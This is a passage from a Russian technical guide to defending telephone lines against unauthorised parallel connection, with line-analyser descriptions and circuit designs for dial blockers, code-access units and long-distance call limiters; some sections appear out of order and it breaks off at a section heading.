Использует измерение коэффициента отражения методом наблюдения за формой отраженного сигнала для обнаружения любого подключения к телефонной линии в радиусе 200 метров. Интерфейс упрощает эксплуатацию. Кабель может быть настроен при помощи одного нажатия кнопки. Функции; тестирование сканированием, проверка непрерывности, проверка проводов на выявление дефекта. Результаты тестирований выводятся на дисплей и пишутся на английском языке. Встроенные соединители BNC и RJ45. Питание от 9В батарейки или трансформатора, который поставляется по желанию. Включает укороченный разъем RJ45 и инструкции к применению.
Телефонный анализатор ТА17-С
Это устройство использует ряд электронных тестов для установления попыток вмешательства в телефонную сеть. Тест высокого напряжения обнаруживает высоковольтные мостики, диодные мостики, емкостные устройства связи, рычажно-переключательные защитные механизмы, стековые и триггерные устройства. Омметр с широким диапазоном обнаруживает устройства подключенные через сопротивление.Без каких-либо дополнительных устройств данное устройство проверяет
все типы телефонных аппаратов и систем, включая одиночные линии, пятилинейные клавишные аппараты, селекторы и телефоны "без рук". Применяется техника звукового зондирования, но если трубку на исследуемой линии поднимут, звук автоматически прекратится и раздастся слышный только проверяющему сигнал тревоги.
Естественно, здесь приведен не полный перечень специализированных приборов, позволяющих определить самовольное подключение к линиям. Необходимо акцентировать внимание, что все приборы, разработанные в целях защиты информации, можно так или иначе использовать для защиты от самовольного коммерческого использования линии.
4. Устройства активной технической защиты.
Активная техническая защита телефонной линии от самовольного подключения предусматривает вмешательство в процесс установления и проведения связи с пиратского аппарата с целью предотвращения реальных финансовых затрат.
Все типы аппаратуры, реализующие активную защиту линий могут устанавливаться как на выходных клеммах АТС, так и на входе оконечных устройств, то-есть у абонента. Место установки блоков защиты определяется необходимостью решения тех или иных задач противодействия.
Преимуществом установки защитных устройств на кроссе АТС является охрана шлейфа АТС-абонент по всей его длине даже при его разрыве. Недостатком является невозможность абонентом самостоятельно определять тактику защиты.
Преимуществом индивидуальной установки блоков является: свобода в выборе устройств защиты, оперативность реагирования на все случаи самовольных подключений, а также, что немаловажно, невмешательство в протокол работы АТС. Недостаток заключается в невозможности контролировать всю длину шлейфа, особенно при его обрыве.
Именно поэтому, для разработчика аппаратуры активной защиты определяющим является постановка задачи противодействия. Наиболее реальная для
большинства пользователей АТС задача формулируется следующим образом: в случае самовольных подключений, финансовые потери необходимо свести к минимуму, не стремясь к их абсолютному исчезновению.
Существует две степени эффективности применения активных средств защиты:
• срыв пиратского подключения — 100% исчезновение финансовых потерь;
• затруднение пиратского подключения —
снижение потерь в два раза.
Следует отметить, что борьба "брони и снаряда" в сфере пиратства еще не закончена, поэтому, если удалось достигнуть степени затруднения. — это уже большой успех. Естественно, определяя эффективность защиты таким образом, мы усредняем все случаи воровства телефонного времени. Для какого-то из абонентов установка простейшего блока защиты может оказаться на 100% эффективной, но только на конкретный период времени.
4.1. Способы запрета набора номера
Вмешательство в процесс связи подразумевает реализацию функции запрета набора номера. Для проводных линии связи существует несколько основных способов запрета набора номера.
• Кратковременный разрыв линии с целью установки аппаратуры АТС в исходное состояние (линия свободна). Подразумевается разрыв одного из линейных проводов на время большее 400-800 мс (по ГОСТ 7153).
• Шунтирование линии резистивно-емкостной цепью. В этом случае, с помощью резистора ограничивается амплитуда импульсов набора номера, что не позволяет АТС определить номер и осуществить соединение, а емкость предназначена для гашения посылок тонового (частотного или DTMF) набора, а также подавления разговора, если соединение все-же состоялось.
• Помехи импульсному и частотному набору номера. Подразумевается искажение формы импульсов набора, уменьшение их количества и т.п., что также не позволяет однозначно определить номер и установить связь.
На Рис. 16 приведена схема ключа на разрыв линии.
В состав схемы входят:
• MOCT—VD1-VD4;
• ключ—DA1;
• зарядная цепочка — С 1, R 1;
• выпрямительный диод — VD5;
• развязывающая цепь R2, С2, R3.
В исходном состоянии (когда от генератора поступает последовательность импульсов запуска) ключ DA1 открыт, так как падение напряжения на цепи Cl, R1 равно напряжению открывания DA1. Соответственно, открыт мост VD1-VD4, и положительный линейный провод замкнут накоротко через прямые переходы диодов VD1-VD4. При необходимости осуществить разрыв линии прекращают подачу импульсов запуска от генератора. Емкость Cl разряжается через сопротивление R1, ключ DA1 закрывается, и, соответственно, закрывается мост VD1, VD4, разрывая, тем самым, плюсовую линейную
шину. Время разрыва определяется управляющим внешним устройством, необходимо только учесть время реакции цепи R1 Cl.
Данная схема может устанавливаться на любом участке шлейфа АТС-абонент. Управляющее устройство может быть запитано от самой АТС.
На Рис. 17 приведена схема шунтирования линии резистивно-емкостной цепью.
В состав схемы входят:
• мост—VD1-VD4;
• ключ—DA1;
• специально рассчитанная резистивно-емкостная цепь RC.
В исходном состоянии, когда линия свободна, на вход DA1 подается логический "ноль" от внешнего управляющего устройства. В этом состоянии нагрузка RC не шунтирует линию. При практическом использовании этой схемы необходимо учитывать, что на ключ DA1 через
емкость С может бьгть. приложено напряжение от 100 до 200 В (при вызове с АТС), в этом случае желательно применять ключи типа КР1014КТ1В, имеющие повышенное напряжение пробоя, или любой другой высоковольтный транзистор, выдерживающий напряжение до 200 В.
При необходимости запрета набора номера на управляющий вход DA1 подается логическая "единица" (2,5-4,5 В). Набор номера на параллельно подключенном телефонном аппарате становится невозможен. Емкость С = 220 мкФ обеспечивает подавление импульсов тонового набора не менее чем на 20 дБ, чего достаточно для того, чтобы номер не воспринимался аппаратурой АТС. Сопротивление R = 2 кОм ограничивает амплитуду импульсного набора до -25 В, чего также достаточно для любого защитного устройства.
На Рис. 18 приведена схема формирования помех импульсному набору номера.
Схема отличается от обычного ключа тем, что в ней отсутствует емкость С, а также наличием генератора Fг частотой 20-100 Гц, который непосредственно управляет ключем DA1. Применение этой схемы позволяет в промежутках между замыканиями линии на сопротивление R контролировать состояние линии (освободил ее пират или нет). Защитные свойства схемы также хороши — набор номера с параллельного аппарата невозможен.
Все описанные выше схемы, в принципе, могут быть установлены на любом участке линии АТС-абонент (в зависимости от конкретной схемы защитного устройства).
4.10. Прием двухзначного кода в DTMF-форме
Когда телефонная линия позволяет осуществить набор номера в частотной форме (ЧНН или DTMF код), устройство защиты также может быть выполнено в виде DTMF-приемника. Наиболее просто эта задача решается с помощью специализированной микросхемы 1008ВЖ18.
На Рис. 27 приведена принципиальная схема блокиратора частотного набора номера с двухзначным DTMF кодом.
В состав схемы входят:
• датчик напряжения линии — VD 1, R1, VD3, R2,DD1.1;
• узел подготовки приема кода — VD5, R4, R5, C2,DD1.2,DD1.3,DA1;
• DTMF-приемники с дешифратором — DD2, DD3;
• узел приема первой цифры — SA2, R14, R15, VD9, С6, DD4.5;
• узел приема второй цифры — SA1, VD8, R13, С5, DD4.3, DD4.4;
• узел временного включения запрета частотного набора — R11, С8, DD4.1, DD4.2, R12;
• ключ запрета — DA2;
• шунтирующая емкость — С7;
• цепь питания узла подготовки приема кода — VD2,R3,C1,VD4;
• элемент питания (9В) DTMF-приемника и декодера.
Принцип работы схемы заключается в следующем.
Подготовка к приему кода
В исходном состоянии ключ DA1 разомкнут, и все микросхемы DTMF-приемника и декодера отключены от элемента питания 9 В по минусовой цепи. При снятии трубки на аппарате ТА через время -1-1,5 секунды ключ DA1 включается "единицей" с выхода 10 DD1.2. DTMF-приемник DD2 готов к приему двух цифр двухчастотного кода. Цепочка R5, С2 предотвращает срабатывание элементов DD1.2, DD1.3 при приеме посылки вызова с АТС.
Прием кода
Микросхема DD2 осуществляет прием DTMF кода через СЗ, R7. На выходе дешифратора DD3 появляется высокий уровень, соответствующий набранной на тастатуре ТА цифре. Раскодировка первой и второй цифры реализованы аналогично схеме, описанной в предыдущем разделе (устройство защиты с двухзначным импульсным кодом). В случае правильного приема двух цифр кода, диод VD11 блокирует включение ключа защиты DA2.
Временное включение запрета
После приема первой цифры кода на выходе 3 DD3 появляется высокий уровень, и начинается заряд емкости С8 через R11. Приблизительно через 5 секунд, через R12, происходит включение ключа запрета DA2. Линия шунтируется специально расчитанной емкостью С7, что обеспечивает подавление дальнейших DTMF-посылок набора более чем на 20 дБ. Это не позволяет аппаратуре АТС однозначно воспринять номер в частотной форме.
Таблица 4. Список деталей схемы устройства кодированного доступа к линии двухзначным DTMF-кодом.
Элемент схемы |
Номинал |
||
DA1.DA2 |
1014КТ1А-В |
R1 |
10М |
DD1 |
К561ЛА7 |
R2 |
1М |
DD2 |
1008ВЖ18 |
R3 |
390К |
DD3 |
К561ИД1 |
R4 |
5.6М |
DD4 |
К561ЛН2 |
R5 |
1М |
ZQ1 |
3579,5 кГц |
R6 |
1,5М |
VD1.VD2 |
КД102А |
R7 |
100К |
VD3,VD4 |
Д814А1 |
R8 |
100К |
VD7 |
КС 147 |
R9 |
З00К |
VD5,VD6,VD8-VD12 |
КД522Б |
R10 |
1К |
С1 |
220,0 мкФх 10В |
R11 |
4.7М |
С2 |
1,0 мкФ |
R12 |
1,5М |
СЗ.С4 |
0,1 мкФ |
R13 |
1М |
С5,С6,С8 |
1,ОмкФ |
R14 |
1М |
С7 |
220,0 мкФх 10В |
R15 |
100К |
Отключение системы запрета
После того, как трубка будет положена на аппарат, напряжение на С7 будет плавно нарастать до значения 60 В, что, в свою очередь, вызовет переход датчика напряжения DD1.1 в исходное состояние, разряд емкости С2 через R4 и, далее, отключение DA1 (а значит отключение микросхем DD2, DD3, DD4 от источника питания 9 В). Схема переходит в исходное состояние.
Для правильного применения блокиратора
частотного набора необходимо выполнять схожий с предыдущей схемой алгоритм:
• снять трубку ТА, услышать ответ станции 425 Гц;
• выдержать паузу 2-3 секунды;
• набрать код на тастатуре ТА (естественно, аппарат должен быть переключен в режим тонового набора — набора номера в DTMF форме);
• осуществить кратковременный сброс линии и вновь дождаться сигнала ответа станции 425 Гц;
• набрать необходимый номер и установить связь.
Следует учитывать невозможность запитывания микросхемы DD2 от телефонной линии, так как она потребляет более 10 мА, поэтому в схеме применяется два источника питания:
• от линии, для питания DD1 — С1, VD4;
• от элемента 9 В, для питания DD2, DD3, DD4. Данная схема может рассматриваться как модельная для конструирования устройств защиты с DTMF-кодом, а также — как отдельное устройство для избирательной защиты телефонных аппаратов, работающих только в тоновом (DTMF) режиме.
4.11. Схема кодового доступа к телефонной линии с 3-х значным последовательным кодом
Данное устройство подробно описано в [2]. Особенностями схемы являются:
• наличие внутреннего источника питания для подключения к ТА и формирования импульсов кода;
• полное отключение телефона в случае
неправильного приема кодовой посылки. Устройство кодового доступа может применяться как для защиты проводных линий связи (с небольшой длиной шлейфа), так и для защиты радиотелефонов в случае установки вблизи базового блока. Код меняется механическим путем (подключением соответствующих выходов микросхем).
В состав схемы входят:
• дешифратор — DD 1, DD2, DD3;
• узел приема посылки вызова с АТС — Cl, R2, VD1, VD2, С2, VD3, DD6.1, VD5;
• узел приема импульсов кода — DD6.4, DD6.3, С5, С4, VD6, R6, R7;
• ключ подключения телефона к линии — VD27-VD30, DA1 с элементами управления R14, VD25, R15, VD26, С16, VD24, VT2, R16, DD4.4;
• источник питания схемы 8В — VD33, R23, C18.VD34;
• внутренний источник питания 40-60В для формирования импульсов кода на элементах VD32, R22, С17, VD31, R20;
• встроенные ловушки R9, С6, R13, Cl I, R19, С14.
Принцип работы схемы заключается в следующем.
По наличию счетчиков DD1-DD3 можно сделать вывод, что данная схема предназначена для приема и дешифрации 3-х значного кода (999 вариантов). Счетчики работают последовательно, при правильной первой цифре счетчик DD1 фиксирует свое состояние через диод VD 10, разрешая счет (прием второй цифры) за счет появления низкого уровня на выходе элемента DD4.1, входе 15 DD2. Далее, при правильном наборе второй цифры счетчик DD2 фиксирует свое состояние через диод VD 18, разрешая счет микросхеме DD3. И далее, если код принят правильно в целом, на выходе элемента DD5.4 появляется напряжение логической единицы, которое через DD4.4 закрывает VT2, открывая таким образом DA1, и мост VD27-VD30 подключает телефон ТА к линии.
В исходном состоянии ключ DA1 закрыт, и телефон ТА подключен лишь к внутреннему источнику питания (VD32, R22, С17, VD31, R20). При снятии трубки телефона (в любом режиме: входящая или исходящая связь) с помощью делителя R5, R4 счетчик DD1 подготавливается к счету (приему 1-й цифры кода). Во время счета, чтобы микросхема DD1 не обнулилась, через цепочку RIO, C7, VD14, VD15, С9, DD4.3 происходит поддержание логического нуля на входе 15 DD1. Одновременно через DD6.2, R3, VT1, VD7 запирается входной узел.
При входящей связи посылка вызова 25 Гц поступает для формирования на входной узел Rl, Cl, R2, VD1, VD2, С2, VD3 и через DD6.1, VD5 приоткрывает в такт поступления посылок вызова с АТС ключ DA1, VD27-VD30, пропуская переменное напряжение вызова на телефон ТА, но в паузе между звонками вновь закрывает ключ DA1. Таким образом, снимая трубку ТА при поступлении вызова в паузе между звонками, чтобы телефон "схватил" линию необходимо набрать код. Цепочки ловушек R9 С6, R13 С11, R19 С14 расчитаны
таким образом, чтобы исключить возможность последовательного подбора кода.
Изменение кода производится механически путем подключения входов DD4.1, DD5.1, DD5.3 к выходам соответствующих счетчиков. При указанных на схеме номерах выводов код допуска в линию — 326. Изменение кода можно произвести с помощью таблицы (Таблица 5).
Подключение элементов ловушек производится на любые свободные выходы DD1-DD3. При неправильном наборе какой-либо цифры кода соответствующая микросхема счетчика блокируется, и повторный набор кода возможен после того, как трубка положена на аппарат, и выдержана пауза в 10-15 с. Длительность паузы определяется емкостью СЗ. Данная схема расчитана на небольшую длину охраняемого шлейфа (до 200 м), вследствие того, что источник питания С 17 запитывается от линии (т.е. расчитан на достаточно низкий ток потребления).
Размер платы 100х60 мм, подключение к линии осуществляется тремя разъемами. Единственным условием является использование телефонов II, III групп сложности с потреблением от линии не более 50-80 мкА.
В режиме ожидания вызова вся схема потребляет не более 50 мкА, а в режиме приема вызова или обработки кода до 150-200 мкА. Номиналы элементов приведены в таблице 6.
Таблица 5. Правила задания кода доступа.
Первая цифра |
Вторая цифра |
Третья цифра |
|||
номер выхода DD1 |
Код |
номер выхода DD2 |
Код |
номер выхода DD3 |
Код |
2 |
1 |
2 |
1 |
2 |
1 |
4 |
2 |
4 |
2 |
4 |
2 |
7 |
3 |
7 |
3 |
7 |
1 |
10 |
4 |
10 |
4 |
10 |
4 |
1 |
5 |
1 |
5 |
1 |
5 |
5 |
6 |
5 |
6 |
5 |
6 |
6 |
7 |
6 |
7 |
6 |
7 |
9 |
8 |
9 |
8 |
9 |
8 |
11 |
9 |
11 |
9 |
11 |
9 |
Таблица 6. Список деталей системы кодового доступа.
Микросхемы |
DD1.DD2.DD3 |
К561ИЕ8 |
DD4, DD5, DD6 |
КР561ЛА7 |
|
DA1 |
КР1014КТ1А(В) |
|
Транзисторы |
VT1 |
КТ315Г |
VT2 |
КТ503Е(КТ315И) |
|
Стабилитроны |
VD3, VD4, VD6,VD14, VD26, VD34 |
Д814А1 |
Диоды |
VD1, VD2, VD7, VD8, VD24, VD25,VD27-VD30,VD31, VD32, VD33 |
КД102А |
Конденсаторы |
С1.С2.С4, С7.С10.С13, С16, С9 |
ЮООпф |
СЗ, С5.С8.С12.С15 |
0.1мкФ |
|
С6, С11, С14 |
0.68мкФ |
|
С17 |
10.0ОмкФхбЗВ |
|
С18 |
2200.0мкФх10В |
|
Резисторы |
R1.R8.R12, R18.R11.R17, R21, R10 |
4.7М |
R2, R3, R4, R7 |
1.5М |
|
R6, R9, R13, R19, R16, R14 |
390К |
|
R5 |
10М |
|
R15, R20, R23 |
130К |
4.12. Совмещение схем защиты с блокиратором параллельного телефона
Составной частью комплекса мероприятий по предотвращению нелегального коммерческого использования телефонных линий является ограничение доступа к ним посторонних лиц. Зачастую, проблема доступа возникает при эксплуатации на одной линии нескольких параллельных телефонных аппаратов. В этом случае кроме обычных неприятных моментов (таких как :
прослушивание разговора, подзвякивание телефона во время набора номера на параллельном аппарате и т.п.) возникает возможность беспрепятственной городской и междугородней связи с любого параллельного аппарата. Если счета на оплату разговоров не персонифицируются, то это позволяет проводить свои личные разговоры за счет предприятия, фирмы и т.д.
Одним из вариантов решения задачи по защите линий является использование совмещенных схем блокираторов параллельного телефона и различных устройств защиты (запрет набора номера, запрет междугородней связи и т.п.).
На Рис. 29 приведена функциональная схема блокировки набора номера для параллельного телефонного аппарата.
Особенностью схемы является беспрепятственное прохождение сигнала вызова на оба ТА, подключенных через блокиратор 1х2. При исходящей связи подъем трубки на основном ТА приводит к обесточиванию цепи второго дополнительного телефона, а также схемы блокировки набора номера (в качестве которой может выступать схема защиты любого типа). Такой подход позволяет избирательно подключать устройства защиты на любой ТА.
В качестве примера рассмотрим принципиальную схему блокировки (запрета) набора номера для параллельного ТА, приведенную на Рис. 30.
В соответствии с данной схемой основной телефонный аппарат ТА1 обладает возможностью как
входящей, так и исходящей (оплачиваемой) связи без ограничений. В свою очередь, для дополнительного параллельного ТА2 остается только входящая (бесплатная) связь. При этом разговоры абонентов ТА1 и ТА2 взаимно не прослушиваются.
В состав схемы входят следующие каскады.
1) Блокиратор параллельного телефона:
• ключи блокировки—DA1,DA2;
• датчики тока — R1,R2;
• узлы формирования — VT1, R3, VT2, R4, DD1.1.DD1.4;
• цепи фильтрации вызова 25 Гц — R5, С1, R6,C2,DD1.2,DD1.3;
• цепь питания от телефонной линии — VD 1, R9, СЗ, VD2.
2) Телефонные аппараты:
• ТА1—основной;
• ТА2 — дополнительный.
3) Схема запрета набора номера:
• ключ блокировки—DA3;
• нагрузочное сопротивление—R 10;
• цепь включения запрета — DD2.1, R11. Работа схемы происходит следующим образом.
Входящая связь
При поступлении вызова с АТС звонят оба телефонных аппарата ТА1, ТА2, так как ключи DA1, DA2 открыты положительным напряжением, поступающим с выходов DD1.2, DD1.3. Цепи фильтрации вызова R5, С1, R6, С2 не позволяют переключить элементы DD1.2 и DD1.3 с единицы в ноль во время вызова 25 Гц, 100В с АТС. Ключ DA3, соответственно, разомкнут и схема запрета набора номера отключена.
Если трубка была снята на ТА2, ключ DA3 подключает нагрузочное сопротивление R 10 параллельно
линии, что несколько снижает громкость разговора (-10%), но в целом не оказывает серьезного влияния на входящую связь.
При снятии трубки на ТА1 ключи DA3, DA2 разомкнуты, схема запрета и телефон ТА2 выключены и, соответственно, входящая связь для ТА1 остается без изменений.
Исходящая связь с ТА1
Аналогично режиму входящей связи, при снятии трубки на ТА1 схема запрета и телефон ТА2 отключены от линии, поэтому связь для ТА1 проходит без каких-либо ограничений.
Исходящая связь с ТА2
При подъеме трубки на ТА2 элемент DD1.3 переключается в ноль (~ через 1,5-2 с), отключая тем самым ТА1 (DA1) и включая схему запрета номера (DA3, R10). Набор номера для ТА2 становится невозможен.
Количество телефонных аппаратов в данной схеме можно увеличить, подключая их в различных точках схемы (например, параллельно входящей линии, параллельно ТА1 или ТА2), получая таким образом различные комбинации функций запрета и разрешения связи для нескольких телефонов. Комбинируя несколько блокираторов параллельного телефона и несколько различных схем защиты, можно получить разветвленные цепочки подключения нескольких ТА с разными приоритетами исходящей связи. На Рис. 31 приведена функциональная схема включения трех ТА с различными схемами защиты.
По этой схеме:
ТА1 — входящая и исходящая связь без ограничений;
ТА2 — запрет исходящей междугородной связи;
ТАЗ — запрет любой исходящей связи, входящая
без ограничений.
Таким образом, совмещение схем блокираторов и защиты является одним из способов реальной технической (активной) защиты линий от самовольного использования.
4.2. Схема защиты от параллельного подключения, выполненная в виде "заглушки"
При неиспользовании абонентом основного телефонного аппарата в течение длительного времени (командировка, выход в город и т.п.) рекомендуется использовать простейшие средства защиты линии от параллельного подключения (т.е. без разрыва шлейфа АТС-абонент).
Такие устройства должны выполнять две основные функции:
• при попытке набора номера с параллельно-подключенного аппарата осуществить запрет набора методом шунтирования линии;
• при приеме посылок вызова от АТС (100 В, 25 Гц) устройство не должно шунтировать линию (система запрета не включается).
На Рис. 19 приведена принципиальная схема устройства защиты от параллельного подключения.
Блок защиты оснащается разъемом, который включается в телефонную розетку вместо основного ТА (ч .с. выполняется в виде "заглушки").
В состав схемы входят:
• диодный мост — VD 1 -VD4;
• датчик напряжения VD5, Rl, VD6, R2, DD1.1;
• фильтр вызова АТС—R3,C1,DD1.2;
• инвертор — DD 1.3;
• ключ—DA1;
• нагрузочное сопротивление — R5;
• цепи питания микросхем — VD7, R6, С2, VD8.
Работа схемы достаточно проста.
В исходном состоянии, когда на линии присутствует напряжение около 60 В, ключ DA1 разомкнут (на выходах 3 DD1.1, 10 DD1.3 уровень логического "нуля").
При попытке набора номера с запаздыванием около 2 с (цепь R3С1) включается ключ DA1, осуществляющий шунтирование линии сопротивлением R5 (запрет дальнейшего набора). Сопротивление R5 необходимо подобрать таким образом, чтобы, когда пиратский телефон будет отключен от линии, напряжение в ней выросло настолько, чтобы узел контроля напряжения на DD1.1 отработал отбой запрета, т.е. переключил элементы DD1.1-DD1.3 в исходное состояние. Ориентировочное значение R5 составляет 2-3 кОм.
При приеме посылок вызова с АТС цепочка R3 С1 не позволяет переключить элементы DD1.2, DD1.3, и линия остается свободной. Диодный мост VD1-VD4 позволяет подключать устройство к телефонной линии без учета полярности.
4.3. Автоматический блок защиты от параллельного подключения
При необходимости эксплуатации блока защиты совместно с основным телефонным аппаратом он должен выполнять следующие функции:
• запрет набора номера в случае параллельного набора;
• отсутствие шунтирования линии при приеме посылок вызова с АТС;
• автоматическое отключение системы запрета набора номера при поднятии трубки основного ТА.
Принципиальная схема устройства, реализующего эти функции приведена на Рис. 20. В состав схемы входят:
• датчик напряжения — VD 1, R3, VD2, DD 1.1;
• схема автоматического обнуления — R4, VD3, DD1.2, С2, VD4, R5, СЗ, VD5;
• датчик тока — R6, VT1;
• фильтр вызова — С 1;
• цепь питания — VD6, R8, С4, VD7.
• ключ запрета — DA 1;
• нагрузочное сопротивление — R1;
В исходном состоянии, когда трубка основного ТА положена на аппарат, на линии присутствует около 60 В, и на выходе 3 DD1.1 — уровень логического "нуля". Ключ DA1 разомкнут, линия свободна.
При попытке набора с параллельного аппарата, импульсы набора через R5, СЗ, VD4 заряжают емкость С2, что приводит к переключению элемента DD1.2. На выходе 4 DD1.2 появляется "ноль", и резистор R4 подключается параллельно С1. Пониженное напряжение в линии (15-20В) через делитель R3, R4 переключает элемент DD1.1. Ключ DA1 открывается, тем самым шунтируя линию сопротивлением R1. Дальнейший набор номера становится невозможным.
При приеме вызова с АТС емкость С 1 предотвращает срабатывание элемента DD1.1 (в этом режиме резистор R4 также подключается параллельно С1).
После прекращения набора номера на пиратском аппарате либо после его отключения от линии, емкость С2 постепенно разряжается через элемент DD1.2 (за 5-15 с), после чего элемент DD1.2 переключается в исходное состояние (на выходе 4 DD1.2 логическая "единица"), и далее, через VD1, R3, идет постепенный заряд емкости С1 до момента срабатывания DD1.1. Важно, что процесс заряда С1 идет при самом низком напряжении в телефонной линии, когда линия нагружена на R5. Таким образом, осуществляется процесс самоотключения ключа DA1 или обнуления блока защиты.
При необходимости позвонить по основному телефонному аппарату абонент просто снимает трубку ТА, в результате чего на датчике тока R6 выделяется напряжение, достаточное для срабатывания VT1, DD1.1 и далее по цепочке DD1.4. Выход 11 элемента DD1.4 закорачивает на корпус управляющий вход DA1, что приводит к принудительному отключению схемы запрета набора номера.
Блок защиты подключается в разрыв телефонной линии с соблюдением полярности и устанавливается вблизи основного ТА, например, в телефонной розетке.
4.4. Световая сигнализация включения схемы запрета набора номера
Зачастую, необходим контроль срабатывания схемы защиты линии. На Рис. 21 приведена схема включения сигнального светодиода с питанием от телефонной линии.
В состав схемы входят:
• ключ—DA1;
• цепь сигнализации — R3, HL 1;
• шунтирующий резистор — R2. При включении ключа DA1 от внешней схемы управления светодиод HL1 загорается, что сигнализирует о запрете набора номера. Сопротивление R2, в принципе, необходимо как страхующий элемент на случай выхода из строя р-n перехода HL1. В этом случае, при отсутствии световой сигнализации шунтирующий резистор R2 продолжает выполнять функцию запрета.
4.5. Устройство блокировки цифры "8"
На всех отечественных АТС доступ к автоматической междугородной и международной связи осуществляется через набор цифры "8". Если необходимо запретить только междугородную связь, обычный блок защиты от параллельного набора не подходит — он не обладает избирательностью.
На Рис. 22 показана принципиальная схема устройства блокировки цифры "8".
На схеме:
• мост униполярного включения — VD 1 -VD4;
• датчик напряжения—VD6, Rl, R2, VD5, DD1.1;
• цепь подготовки к запуску счетчика — R4, С2, DD1.2;
• счетчик — DD2;
• цепь включения запрета — R8, С4, DD1.3, DD1.4; '
• ключ—DA1;
• шунтирующее сопротивление — R5;
• цепь питания микросхем — VD7, R7, СЗ, VD8.
В исходном состоянии: счетчик обнулен высоким уровнем с выхода 4 DD1.2, ключ DA1 разомкнут, линия свободна.
При снятии трубки телефонного аппарата, подключенного параллельно устройству, на выходе 3 DD1.1 появляется логическая "единица". Через 1,5-2 секунды счетчик DD2 готов к счету импульсов. При наборе цифры "8" и небольшой паузе после нее (ожидание длинного гудка готовности АМТС) на выходе 9 DD2 (после восьмого импульса счета) появляется "единица", что приводит к включению ключа DA1 через DD1.3 - DD1.4. Линия шунтируется сопротивлением R5 и дальнейший набор номера становится невозможным.
При наборе любого другого номера не начинающегося с цифры "8" и при отсутствии пауз ожидания между цифрами линия остается свободной. Кратковременное появление логической единицы на выходе 9 DD2 не приводит к срабатыванию DA1 ввиду наличия буферной цепочки R8, С4.
Обнуление линии (и счетчика) происходит после того, как трубка телефонного аппарата была положена. Для устойчивого саморазблокирования необходимо подобрать шунтирующее сопротивление R5 (ориентировочно 2,5-3 кОм).
При поступлении вызова с АТС цепочка фильтрации R4, С2 не позволяет счетчику DD2 перейти в режим счета и зашунтировать линию.
4.6. Схема запуска ограничителя междугородной связи
На основе приведенной выше схемы блокиратора цифры "8" можно сделать устройство индикации (ограничения) длительности междугородной связи. На Рис.23 приведена схема запуска ограничителя междугородной связи.
В состав схемы входят:
• таймер;
• ключ—DA1;
• резистивно-емкостная цепь — R6, С2;
• звуковой генератор — DD2, R4, R5, СЗ, ЗП-3;
• цепь питания VD 1, R2, С 1, VD2;
• счетчик цифр — DD1.
Датчик контроля напряжения и цепи подготовки к счету DD1 аналогичны описанным в схеме блокиратора цифры "8".
При наборе цифры "8" и выходе на междугородную связь происходит запуск таймера с заранее выставленным временем срабатывания. Включение ключа DA1 и звукового генератора DD2 говорит об окончании установленного времени.
Шунтирование линии цепью R6, С2 приводит к подавлению разговора более чем на 20 дБ. В принципе, ключ DA1 может отсутствовать, тогда вся схема носит сигнализирующий характер для самоконтроля абонента.
4.7. Блокиратор междугородного кода с ограничением количества цифр номера
Еще один способ запрета междугородной связи заключается в ограничении количества набираемых цифр номера. Практика показывает, что в большинстве случаев максимальное количество цифр номера внутригородской связи не превышает восьми (5-7 значный номер плюс одна цифра ведомственной АТС, чаще всего "9"). Тогда, выход на междугородную связь подразумевает следующую
последовательность набора: "8" + код города (минимум три цифры) + номер вызываемого абонента (минимум пять цифр), что в сумме составляет девять цифр и более. Таким образом, если ограничить номер восемью цифрами, можно застраховать себя от дорогостоящих междугородных и тем более международных разговоров.
На Рис. 24 приведена принципиальная схема блокиратора с ограничением количества цифр номера.
В состав схемы входят:
• датчик тока—R1,VT1;
• фильтр вызова АТС—R4,C2,DD1.2;
• счетчик — DD2;
• ограничитель времени запрета — R7, С4, DD1.3;
• цепь формирования импульсов счета — VD3, R5,C3;
• ключ—DA1;
• нагрузочное сопротивление — R8;
• цепь питания — VD1, R3, С1, VD2.
Принцип работы схемы заключается в следующем.
В исходном состоянии: счетчик DD2 обнулен, на выходе 3 DD1.1 - "ноль", на выходе 4 DD1.2 - "единица", ключ DA1 закрыт, линия свободна.
При снятии трубки на телефонном аппарате через время, задаваемое R4, С2, счетчик DD2 подготавливается к счету (появляется "ноль" на выходе 4 DD1.2).
При наборе номера на аппарате датчик тока R1 через VT1 синхронно с импульсами набора номера переключает элемент DD 1.1. Сформированные таким образом импульсы поступают на вход 14 DD2. Цепочка R5, СЗ расчитана таким образом, чтобы время заряда СЗ было много больше, чем время разряда СЗ через VD3, поэтому счетчик DD2 осуществляет счет не конкретных импульсов, а группы импульсов, то есть количества цифр набираемого номера.
Изначально, ключ DA1 заперт через VD6 на выход 9 DD2, находящийся в состоянии логического нуля.
После того, как счет цифр номера приводит к появлению высокого уровня на выходе 9 DD2, ключ DA1 открывается плюсом питания через резистор R9. Линия шунтируется сопротивлением нагрузки R8. Одновременно, счет цифр останавливается подачей единицы на вход 13 DD2 через VD4. Кроме этого, начинается постепенный заряд емкости С4 через R7 (10-12 секунд). В течение этого времени набор номера невозможен. По истечении времени, необходимого для зарядки С4, элемент DD1.3 переключается, и на выходе 10 DD1.3 появляется логический "ноль", который практически мгновенно обнуляет блокиратор (диод VD7 - отключение ключа DA1, диод VD5 - обнуление счетчика). После этого блокиратор опять находится в режиме ожидания.
Защитный эффект достигается тем, что на всех междугородных АТС, ввиду их большой загрузки, сокращено время ожидания каждой цифры номера. Если при наборе междугородного кода возникнет пауза между цифрами более 8-10 секунд, АТС дает отбой в линию. Кроме этого, при самовольном подключении абонент может не прекратить дальнейший набор номера (он не знает, что линия зашунтирована), и, соответственно, девятая и последующие цифры номера набираются впустую, так как АТС их не воспринимает. После того, как трубка была положена на аппарат, через время, определяемое опять же R4, С2, блокиратор вернется в исходное состояние.
Для этой схемы характерно, что она допускает большой разброс временных параметров: например, время подготовки счетчика, определяемое R4, С2 (т.н. фильтр вызова АТС) можно смело сократить вдвое. В результате, посылка вызова АТС может быть обработана счетчиком DD2, но будут обрабатываться не импульсы 25 Гц, а группы, т.е. огибающая сигнала вызова. Счетчик каждый раз будет переключаться на одно состояние вниз, а потом (в паузах) обнуляться. Кроме этого, время запрета, определяемое R7, С4, можно смело увеличить в несколько раз, что еще больше затруднит самовольный выход на межгород.
При эксплуатации такого блокиратора те абоненты, которые будут использовать обычные внутригородские номера, должны делать обязательную 2-4 секундную паузу между наборами различных номеров, чтобы исключить возможность включения запрета.
4.8. Схема кодированного доступа к линии через одну цифру
